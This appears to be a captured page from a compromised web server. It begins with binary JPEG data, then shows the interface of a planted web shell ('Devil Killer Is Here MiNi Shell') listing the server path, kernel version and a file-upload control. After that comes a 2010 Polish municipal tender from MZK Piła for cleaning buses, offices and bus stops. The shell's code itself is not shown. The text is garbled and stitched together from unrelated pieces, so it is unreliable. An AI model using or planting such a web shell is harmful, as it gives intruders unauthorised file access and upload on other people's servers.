JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100929/268413-N-2010.html

<p class="kh_header"><b>Piła: Zadanie 1
sprzątanie i mycie pojazdów,


Zadanie 2 
sprzątanie pomieszczeń biurowych i przemysłowych, 
Zadanie 3
sprzątanie i odśnieżanie przystanków autobusowych.</b><br>
<b>Numer ogłoszenia: 268413 - 2010; data zamieszczenia: 29.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Komunikacji Spółka z ograniczoną odpowiedzialnością w Pile , ul. Łączna 4, 64-920 Piła, woj. wielkopolskie, tel. 067 2129701, faks 067 2139702.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
sprzątanie i mycie pojazdów,


Zadanie 2 
sprzątanie pomieszczeń biurowych i przemysłowych, 
Zadanie 3
sprzątanie i odśnieżanie przystanków autobusowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - Sprzątenie i mycie autobusów
1. Utrzymanie w czystości wnętrza autobusów oraz pozostałych pojazdów Zamawiającego.
Zakres czynności:
W ramach utrzymania w czystości autobusów, Wykonawca jest zobowiązany wykonać codziennie sprzątanie i mycie wnętrza pojazdów, które w danym dniu były użytkowane na liniach lub obsługiwane w ramach obsług i napraw technicznych. Zakres sprzątania, stosowane technologie pozostają w gestii Wykonawcy. Warunkiem koniecznym pozostaje jednak, że stosowane technologie, środki i wykonywane czynności nie mogą powodować uszkodzenia pojazdu lub dodatkowego (nie wynikającego z typowego użytkowania) skrócenia żywotności jego elementów.
Wykonawca codziennie do godziny 4:00 jest zobowiązany oddać do użytkowania pojazdy w których czyste powinny być przedział pasażerski i kabina kierowcy w następującym zakresie:
opróżnione i wyczyszczone śmietniczki,
odkurzona, czysta i sucha podłoga w tym przestrzenie pomiędzy siedzeniami, nadkola wewnętrzne 
i stopnie wewnętrzne,
czyste ściany, poręcze, sufit,
czyste stopnie wejściowe w tym przestrzenie za drzwiami, w okresie zimowym usunięty śnieg i lód, 
usunięte napisy obce, rysunki wewnątrz autobusu,
siedzenia z tworzyw sztucznych bez zabrudzeń,
siedzenia tapicerowane bez zabrudzeń, w razie potrzeby odkurzona tapicerka,
parapety, osłony urządzeń sterowania ( np. drzwi), tablice reklamowe czyste,
czyste lusterka wewnętrzne,
czyste obudowy nagrzewnic, tablic kierunkowych,
usunięte zabrudzenia szyb wewnątrz (szczególnie w okresie letnim powstałe wskutek kontaktu	z dłońmi itp.),
inne rażące zabrudzenia usunięte lub umyte. 
Wykonawca podczas sprzątania codziennego jest zobowiązany zwrócić szczególną uwagę na wszystkie elementy, które mogą się stykać z odzieżą pasażerów i spowodować jej zabrudzenie. 
Pozostałe pojazdy Zamawiającego (dwa typu dostawczego, jeden typu osobowego) poddawane będą kompleksowemu czyszczeniu wnętrza (czyszczenie tapicerki drzwi, podłogi, siedzeń, dachu, przedziału ładunkowego  oraz wyposażenia) w zależności od potrzeb, po uprzednim zgłoszeniu przez uprawnionego pracownika. Dla tej grupy pojazdów sprzątanie i czyszczenie wnętrza wykonywane będzie średnio raz w miesiącu. 
2. Utrzymanie w czystości poszycia zewnętrznego autobusów oraz pozostałych pojazdów Zamawiającego.
Zakres czynności:
W ramach utrzymania w czystości poszycia zewnętrznego autobusów, Wykonawca jest zobowiązany wykonać mycie całościowe lub częściowe zabrudzonych pojazdów. Częstotliwość mycia autobusów, jego zakres, stosowane technologie pozostają w gestii Wykonawcy. Warunkiem koniecznym pozostaje jednak, że stosowane technologie, środki i wykonywane czynności nie mogą powodować uszkodzenia poszycia pojazdu lub naklejonych reklam, szczególnie dodatkowego (nie wynikającego z typowego użytkowania) skrócenia żywotności powłoki lakierniczej. 
Wykonawca codziennie do godziny 4:00 jest zobowiązany oddać do użytkowania pojazdy w których czyste powinno być poszycie zewnętrzne w następującym zakresie:
a)powłoka lakierowa nie zabrudzona (dopuszcza się jedynie nieznaczne okurzenie powłoki lakierowej nie powodujące zauważalnej różnicy w jej barwie - w dni suche, szczególnie w okresie letnim nie jest więc wymagane codzienne mycie zewnętrzne pojazdów),
b)szyby pojazdu czyste zarówno od zewnątrz jak i od wewnątrz,
c)szyba przednia i boczne w obrębie kabiny kierowcy czyste, bez plam lub zacieków,
d)koła pojazdów w tym felgi czyste, szczególnie bez śladów  substancji ropopochodnych,
e)lusterka zewnętrzne czyste, trwale zamocowane do pojazdu, ustawione typowo do jazdy. 
Wykonawca jest zobowiązany zwrócić szczególną uwagę na wszystkie elementy, które ulegają wzmożonemu zabrudzeniu, w tym szczególnie nadkola, koła, pas dolny, ściana tylna przy wylocie spalin.
W okresie zimowym mycie pojazdów nie może skutkować zamarznięciem podzespołów, w tym drzwi.
Z uwagi na powyższe przy temperaturach niższych niż - 50C Wykonawca jest zwolniony z wykonywania mycia zewnętrznego pojazdów. 
Pozostałe pojazdy Zamawiającego (dwa typu dostawczego, jeden typu osobowego) poddawane będą myciu zewnętrznemu w zależności od potrzeb, po uprzednim zgłoszeniu przez uprawnionego pracownika. 
3. Okresowe mycie podwozia, silników  oraz innych podzespołów.
Zakres czynności:
W ramach zamówienia Wykonawca jest zobowiązany dokonywać okresowego, tj. nie rzadziej niż 1 raz
w miesiącu, ciśnieniowego mycia podwozia każdego pojazdu (przy wykorzystaniu myjni podwoziowej).
W okresie zimowym mycie podwozia odbywać się musi częściej, jednak  przy uwzględnieniu warunków atmosferycznych - niedopuszczenie do zamarzania.  
Przed każdą obsługą techniczną, po uprzednim zgłoszeniu przez uprawnionego pracownika Zamawiającego, wymagane jest wykonanie kompleksowego mycia podwozia pojazdu (ewentualnie wskazanych podzespołów) w tym szczególnie kompleksowe mycie silnika. Mycie silnika musi odbywać się
z zachowaniem warunków technologicznych, tj. nie może powodować uszkodzeń jego instalacji bądź wtłoczenia wody w newralgiczne i wrażliwe elementy (łączenia elektryczne, filtr powietrza, układ wydechowy).
I.Warunki organizacyjne. 
1.Stan taboru w okresie rozpoczęcia umowy:
a)21 autobusów typu Solaris Urbino,
b)17 autobusów typu Neoplan N 4000,
c)8 autobusów typu Jelcz,
d)inne pojazdy: dwa dostawcze marki VW (T4 oraz Caddy), jeden typu osobowego marki 	Daewoo Nubira. 
2.Dostępność pojazdów. 
Cykl zjazdów z linii i dostępność w zajezdni autobusów przedstawiono w załączniku 9 do SIWZ.
3.Zamawiający udostępni Wykonawcy do wykonania zamówienia pomieszczenie myjni (halę), plac 	postojowy oraz w wyjątkowych sytuacjach, po wcześniejszym uzgodnieniu, stanowiska naprawcze.
4.Wykonawcy do wykonania usługi udostępnia się urządzenie - myjnię portalową wraz z instalacją 	wtórnego obiegu wody oraz urządzeniem do wysokociśnieniowego mycia podwozia. 
Z uwagi na to, że urządzenia są  nowe, sterowane komputerowo oraz posiadają szereg funkcji, ich	obsługa wymaga przeszkolonej obsługi. Stąd pracownicy wyznaczeni przez Wykonawcę do obsługi myjni powinni posiadać potwierdzenie odbycia stosownego przeszkolenia. Jest to istotne, bowiem nieumiejętna obsługa może doprowadzić do uszkodzenia pojazdu, urządzenia lub w skrajnymprzypadku skutkować wypadkiem obsługującego.
Przekazanie Wykonawcy hali, jej wyposażenia i urządzeń odbywać się będzie na podstawie protokołu z dokładnym opisem stanu technicznego. Wykonawca jest zobowiązany zwrócić urządzenia w stanie, w jakim je otrzymał do użytkowania (uwzględniając jedynie typowe zużycie eksploatacyjne), w szczególności ponieść wszystkie koszty obsług zgodne z dokumentacją techniczno - ruchową oraz koszty ewentualnych braków, regulacji, wymiany zużytych szczotek myjni oraz obsług i naprawy uszkodzeń, jakie wynikną w trakcie użytkowania urządzeń przez Wykonawcę. Ponadto Wykonawca jest zobowiązany do utrzymywania w należytym stanie, czystości hali wraz z wyposażeniem.
5.Zamawiający udostępnia Wykonawcy odpłatnie wodę i energię elektryczną. Rozliczenie w tym	zakresie odbywać się będzie comiesięcznie (ostatni dzień każdego miesiąca) na podstawie faktycznego zużycia (wskazania liczników). 
6.Autobus do mycia i sprzątania Wykonawca otrzyma po uzgodnieniu z Dyspozytorem i za jego zgodą. Wykonawca jest zobowiązany w ramach czynności własnych wstawić pojazd na stanowisko (myjnię), po wykonaniu czynności odstawić pojazd na właściwe stanowisko postojowe. Pojazd musi 	pozostać zabezpieczony, z zamkniętymi oknami, drzwiami. Wyznaczeni pracownicy Wykonawcy muszą posiadać stosowne uprawnienia do kierowania oraz przeszkolenie w zakresie obsługi pojazdów Zamawiającego. 
Przejmując autobus, np. by wjechać na myjnię, Wykonawca:
a)bierze za niego odpowiedzialność, obejmującą też obowiązek naprawienia ewentualnych szkód wynikłych w czasie dysponowania pojazdem,
b)zobowiązany jest ustalić faktyczny stan techniczny poszycia zewnętrznego pojazdu orazukompletowanie wyposażenia. Ujawnione usterki typu: zarysowania, wgniecenia, braki jestzobowiązany natychmiast zgłosić Dyspozytorowi, w przeciwnym przypadku może zostać obciążony kosztami napraw w tym zakresie (jeżeli uszkodzenia poszycia lub braki zostaną	stwierdzone po zakończeniu prac przez Wykonawcę, a przed wyjazdem pojazdu na linię). 
7.Wykonane prace będą potwierdzone na codziennych kartach ewidencyjnych - potwierdzenie wykonania zakresu czynności przy danych pojazdach (sprzątanie, mycie, zakres prac innych typu  mycie podwozia, silnika). Karta ewidencyjna po wykonaniu usługi zdawana będzie do Dyspozytora. Zdanie karty stanowić będzie potwierdzenie Wykonawcy oddania pojazdów do użytkowania. 
W przypadku stwierdzenia braków w zakresie lub jakości wykonywanych prac miesięczne wynagrodzenie Wykonawcy umniejszone zostanie dla każdego stwierdzonego przypadku (każdego pojazdu w danym dniu) o 1 %. W przypadku wstąpienia opisanej sytuacji, niezwłocznie po stwierdzeniu uchybień o powyższym informowany będzie uprawniony przedstawiciel Wykonawcy (wymagane jest przekazanie przez Wykonawcę danych kontaktowych do uprawnionych pracowników). Upoważniony do kontaktów z Wykonawcą w powyższym zakresie będzie Dyspozytor lub inny upoważniony pracownik Zamawiającego. Powyższe odnotowane zostanie na dziennej karcie ewidencyjnej wykonanych czynności. Na koniec każdego miesiąca  na podstawie dziennych kart ewidencyjnych wykonanych czynności wystawiony zostanie protokół wykonanych prac (podsumowanie miesięczne co do ilości i rodzaju czynności oraz łącznej ilości stwierdzonych braków). W przypadku wystąpienia w danym miesiącu braków co do jakości wykonanych usług (opisanych w protokole) Wykonawca jest zobowiązany to uwzględnić w wartości wystawionej faktury. 
Pomimo umniejszenia wynagrodzenia Wykonawca zobowiązany będzie niezwłocznie usunąć stwierdzone braki i uchybienia. W przeciwnym przypadku zostanie to wykonane na jego koszt,
w sposób, jaki Zamawiający uzna za wymagany.  
W przypadku stwierdzenia przy odbiorze usterek w zakresie stanu poszycia zewnętrznego
i wyposażenia, nie zgłoszonych wcześniej Dyspozytorowi podczas przejmowania pojazdu przez Wykonawcę, uznane zostaną one jako szkody spowodowane z jego winy.
8.Rozliczenie za wykonane prace będzie się odbywać w okresach miesięcznych. 
9.Prace związane z utrzymaniem w czystości autobusów nie powinny dezorganizować obowiązującej u Zamawiającego organizacji pracy.
10.Udostępnione urządzenia i halę Wykonawca może wykorzystywać jedynie do obsługi pojazdów 	Zamawiającego. 
II.Inne zagadnienia. 
1.Wykonywane czynności związane z utrzymaniem czystości nie mogą zwiększać zagrożenia bezpieczeństwa pracy.
2.Wykonawca zobowiązany zostanie do przeszkolenia swoich pracowników w zakresie przestrzegania 	przepisów BHP i ppoż. na terenie zajezdni autobusowej.
3.Zabrania się mycia podłóg i wnętrza autobusów strumieniem wody.
4.Zabrania się kierowania autobusami przez pracowników Wykonawcy nie posiadających stosownych	uprawnień.
5.Pracownicy Wykonawcy w czasie wykonywania prac oraz w czasie przebywania na terenie MZK Piła Sp. z o.o. winni stosować się do obowiązujących przepisów prawa oraz przepisów wewnętrznych Zamawiającego.
6.MZK Piła Sp. z o.o. zapewni Wykonawcy korzystanie z wody i energii elektrycznej oraz myjni mechanicznej znajdującej się na terenie zajezdni autobusowej na zasadach określonych w SIWZ.
7.Awaria myjni mechanicznej nie zwalnia Wykonawcy z obowiązku utrzymania pojazdów w należytej czystości.
8.Wykonawca ponosi odpowiedzialność za przestrzeganie przepisów BHP, ppoż. i ochrony 	środowiska oraz przestrzeganie trzeźwości przez pracowników zatrudnionych przy myciu i 	sprzątaniu autobusów.
9.Szkolenie własnych pracowników i uzyskanie przez nich stosownych uprawnień o których mowa
w niniejszej SIWZ (obsługi urządzeń, kierowania pojazdami) stanowi koszt Wykonawcy.
10.Miejsce wykonania usługi - zajezdnia MZK Piła, ul. Łączna 4.
Zadanie 2 - Sprzątanie  pomieszczeń biurowych i przemysłowych.
1. Sprzątania pomieszczeń biurowych i sanitarnych w budynkach przy ul. Łącznej 4 w Pile.
1.1. Zakres prac:
a)Codzienne sprzątanie pomieszczeń biurowych - odkurzanie, mycie podłóg, wycieranie kurzu z 	mebli i sprzętów biurowych oraz parapetów, mycie drzwi, opróżnianie koszy na śmieci.
b)Codzienne sprzątanie pomieszczeń ogólnych (korytarzy, klatek schodowych, ciągów 	komunikacyjnych) - odkurzanie i mycie podłóg, , mycie drzwi, czyszczenie poręczy.
c)Mycie przeszkleń wg potrzeb.
d)Codzienne sprzątanie pomieszczeń sanitarnych - odkurzanie i mycie podłóg i ścian, mycie oraz 	dezynfekcja urządzeń sanitarnych uzupełnianie papieru toaletowego, ręczników papierowych i mydła.
e)Gruntowne maszynowe czyszczenie oraz zabezpieczenie posadzek dwa razy w roku. 
f)Pranie wykładzin dywanowych dwa razy w roku.
g)Mycie okien jeden raz na kwartał.
h)Pranie mebli tapicerowanych jeden raz w roku.
i)Pranie verticali okiennych jeden raz w roku.
j)Sprzątanie i utrzymanie w czystości terenów zewnętrznych należących do  MZK Piła Sp. z o.o. - 	koszenie trawy i przycinanie oraz pielęgnacja  żywopłotów drzew (doraźne w miarę potrzeb, 	przewidywana częstotliwość  koszenia jeden raz w tygodniu), zbieranie śmieci, usuwanie chwastów  	z terenów utwardzonych ( polbruku i trylinki). 
k)Odśnieżanie w okresie zimowym ciągów komunikacyjnych i placu postojowego autobusów umożliwiającego. 
1.2 Rodzaje i powierzchnia podłóg do sprzątania codziennego: 
a)Granitogresy, glazura, terakota, lastryko - 462,5 m2,
b)Tarket - 290,5 m2,
c)Wykładzina dywanowa - 22,1 m2,
d)Wykładzina PCW (w piwnicy, sprzątanie 1 raz w miesiącu) - 57,9 m2
1.3. Rodzaje i ilości urządzeń sanitarnych:
a)Toalety - sztuk 8,
b)Umywalki - sztuk 20,
c)Prysznice - sztuk 3,
d)Pisuary - sztuk 5,
e)Zlewozmywaki - sztuk 3.
1.4.Informacje pozostałe:
a)Powierzchnia terenów zielonych - 10 500 m2
b)Powierzchnia placu postojowego autobusów z wyjazdem - 14 400 m2
c)Wykonawca dostarczy we własnym zakresie sprzęt oraz środki czystości 
d)Dezynfekcji zgodnie z obowiązującymi przepisami
e)Środki higieny osobistej dostarcza zleceniobiorca (papier toaletowy, ręczniki papierowe, mydło)
2. Sprzątania powierzchni przemysłowych w budynkach przy ul. Łącznej 4 w Pile.
Zamawiający może zlecić Wykonawcy jednorazowe sprzątanie pomieszczenia hali warsztatowej i stacji diagnostycznej. 
2.1. Zakres sprzątania - odkurzanie i mycie podłóg i ścian oraz kanałów, odkurzanie sprzętu, mycie okien i bram.
2.2. Rodzaje i ilości podłóg i ścian do mycia:
a)Posadzka z granitogresów w diagnostyce - 220 m2
b)Ściany glazurowane w diagnostyce - 100 m2
c)Ściany malowane farbą olejną w diagnostyce - 100 m2
d)Posadzka betonowa antypoślizgowa w technologii sika w myjni autobusowej - 220 m2
e)Ściany glazurowane na ścianie myjni (na odcinku pracy urządzenia myjni znacznie zabrudzone) - 	350 m2
3. Sprzątanie i odśnieżanie przystanków autobusowych.
3.1.Sprzątanie przystanków.
3.1.1. Zakres prac:
a)Oczyszczanie nawierzchni przystanków z papierów i innych zanieczyszczeń zgodnie z harmonogramem sprzątania.
b)Odśnieżanie niewielkiej ilości opadów śniegu i posypywanie piaskiem w okresie zimowym zgodnie z harmonogramem sprzątania (odśnieżanie w przypadku  znacznych opadów śniegu na podstawie oddzielnego zlecenia).
c)Mycie wiat przystankowych oraz znaków przystankowych jeden raz w miesiącu (typu Budotechnika-sztuk 98, typu Warszawska- sztuk 8, typu Kami sztuk 1, Deptak - na ul. Śródmiejskiej - sztuk 1), szczegółowy wykaz wiat do mycia dołączony zostanie do podpisanej umowy.
d)Mycie przeszkleń wiat w miarę potrzeb
e)Mycie koszy w miarę potrzeb
f)Sprzątanie zanieczyszczeń w razie interwencyjnych zgłoszeń
g)Wykonywanie drobnych prac konserwacyjnych przy użyciu materiałów  dostarczonych przez zamawiającego
3.1.2.Harmonogram sprzątania przystanków:
I strefa - sprzątanie codzienne:
Al. Piastów - sztuk 2
Al. Wojska Polskiego koło poczty  - sztuk 2
14-Lutego - sztuk 2
Dworzec PKP - sztuk 1
Bydgoska przy Roosevelta - sztuk 2
Szpital specjalistyczny - sztuk 1
1 Maja koło Merkurego - sztuk 1
Śródmiejska - sztuk 1
Plac Konstytucji 3 Maja - sztuk 2
Browarna koło Kościoła -sztuk 2
Śniadeckich koło Kościoła - sztuk 1
Bydgoska PKO - sztuk 2
Bydgoska WCH - sztuk 2
Al. Wojska Polskiego - Ars Medical - sztuk 2
Ludowa - sztuk 2
Okólna - sztuk 2
Lelewela - szkoła - 2sztuki, pętla - sztuk 1
Kossaka pętla - sztuk 1 
Plac Zwycięstwa - sztuk 1
Podchorążych PWSZ - sztuk 2
Al. Powstańców pętla Philips - sztuk 1
Wyspiańskiego SP nr 6 - sztuk 2
II strefa - sprzątanie jeden raz w tygodniu:
1.Cmentarz Motylewska - sztuk 2
2.Al. Poznańska - Motylewska - sztuk 2
3.Al. Poznańska Stogrosz - sztuk 2
4.Al. Poznańska wiadukt PKP - sztuk 2
5.Walki Młodych - sztuk 2
6.Kossaka Wodnik - sztuk 2
7.Łączna - sztuk 2
8.Zielona Dolina (staropolska) - sztuk 2
9.Al. Wyzwolenia - Śniadeckich  - sztuk 2
10.Śniadeckich S.P. nr 10 - sztuk 2
11.Dąbrowskiego Berpil - sztuk 2
12.Plac Inwalidów - sztuk 2
13.Wyspiańskiego Bank PeKaO S.A. - sztuk 2
14.Buczka LO -sztuk 2
15.Al. Niepodległości - sztuk 8
16.Al. Wojska Polskiego - 3 sztuki
17.Pozostałe przystanki (około 185 sztuk)
Szczegółowy wykaz przystanków do sprzątania dołączony zostanie do podpisanej umowy
3.1.3. Informacje pozostałe:
a)czynności sprzątania wykonywane będą w dni robocze od poniedziałku do piątku;
b)pod pojęciem przystanku rozumie się miejsce wsiadania i wysiadania pasażerów;
c)za teren przystanku należy przyjmować powierzchnię chodnika przylegającego bezpośrednio do drogi na odcinku długości min. 12 mb lub odcinka chodnika przylegającego bezpośrednio do zatoki autobusowej i 3 m oraz tereny pod wiatami i wokół wiat i kiosków
d)pojęcie sprzątania przystanków jest zgodne z Art. 5 ustawy z dnia 13.09.1996 roku
O utrzymaniu porządku w gminach
e)wykonawca musi być ubezpieczony i będzie ponosił odpowiedzialność cywilną za   niewłaściwe wykonanie usługi oraz skutki dla użytkowników przystanków wynikające
z niewłaściwego wykonania usługi lub braku wykonania usługi.
f)przystanki położone są przy liniach autobusowych o łącznej długości 282,2 km (długość tras 86,5 km), średnia powierzchnia przystanku około 40 m2.  
3.2. Odśnieżanie przystanków.
3.2.1. Zakres prac.
Oczyszczanie nawierzchni przystanków z śniegu i lodu oraz posypanie piaskiem zgodnie
z harmonogramem odśnieżania oraz schematem na załączniku nr 2 i 3. 
3.2.2. Harmonogram odśnieżania przystanków.
W przypadku występowania opadów decyzję o rozpoczęciu akcji odśnieżania podejmuje  odpowiedzialny pracownik MZK Piła Sp. z o.o. przekazując telefoniczne polecenia odśnieżenia wyznaczonemu przedstawicielowi Zleceniobiorcy. 
Wyznaczono trzy strefy kolejności odśnieżania:
I strefa - przystanki pierwszej kolejności odśnieżania, które należy odśnieżyć w ciągu 2 godzin od momentu otrzymania polecenia o rozpoczęciu akcji:
1.Al. Piastów - sztuk 2
2.Wodna - sztuk 2
3.Popiełuszki - sztuk 2
4.Al. Niepodległości - sztuk 2
5.Dworzec PKP - sztuk 1
6.1 Maja koło Merkurego - sztuk 1
7.Śródmiejska - sztuk 1
8.Buczka - sztuk 2
9.Plac Konstytucji 3 Maja - sztuk 2
10.14 Lutego - sztuk 2
11.Browarna koło Kościoła -sztuk 2
12.Dzieci Polskich - sztuk 2
13.Okrzei - sztuk 3
14.Plac Zwycięstwa  - sztuk 1
15.Al. Wojska Polskiego - sztuk 3
16.Bydgoska PKO - sztuk 2
17.Bydgoska WCH - sztuk 2
18.Al. Powstańców Wlkp. przy banku - sztuk 2
19.Wyspiańskiego sztuk 4
20.Kossaka, centrum + Philips - sztuk 3
21.Lelewela -sztuk 1
22.Szpital Wojewódzki - sztuk 1
II strefa - przystanki drugiej kolejności odśnieżania, które należy odśnieżyć w ciągu 3 godzin od momentu otrzymania polecenia o rozpoczęciu akcji:
1.Al. Wojska Polskiego od parku - sztuk 6
2.Ludowa - sztuk 2
3.Okólna - sztuk 2
4.Lelewela - sztuk 6 
5.Kossaka - sztuk 4 
6.Podchorążych PWSZ - sztuk 2
7.Al. Powstańców Wlkp. - sztuk 6
8.Cmentarz Motylewska - sztuk 2
9.Al. Poznańska - sztuk 12
10.Walki Młodych - sztuk 7
11.Kossaka  - sztuk 4
12.Łączna - sztuk 2
13.Zielona Dolina (Staropolska) - sztuk 2
14.Al. Wyzwolenia  - sztuk 3
15.Śniadeckich - sztuk 8
16.Dąbrowskiego Berpil - sztuk 2
17.Plac Inwalidów - sztuk 2
III strefa - trzeciej kolejności odśnieżania, pozostałe przystanki, które należy odśnieżyć w ciągu
4 godzin od momentu otrzymania polecenia o rozpoczęciu akcji. Szczegółowy wykaz przystanków do odśnieżania dołączony zostanie do podpisanej umowy.
3.2.3. Informacje pozostałe.
a)pod pojęciem przystanku rozumie się miejsce wsiadania i wysiadania pasażerów
b)za teren przystanku należy przyjmować powierzchnię chodnika przylegającego bezpośrednio do drogi na odcinku długości min. 12 mb lub odcinka chodnika przylegającego bezpośrednio do zatoki autobusowej i 3 m oraz tereny pod wiatami i wokół wiat i kiosków
c)pojęcie odśnieżania jest zgodne z Art. 5 ustawy z dnia 13.09.1996 roku O utrzymaniu porządku w gminach
d)wykonawca musi być ubezpieczony i będzie ponosił odpowiedzialność cywilną za niewłaściwe wykonanie usługi oraz skutki dla użytkowników przystanków wynikające z niewłaściwego wykonania usługi lub braku wykonania usługi.
e)przystanki położone są przy liniach autobusowych o łącznej długości 282,2 km (długość tras 86,5 km), średnia powierzchnia przystanku około 40 m2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.70.00-8, 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

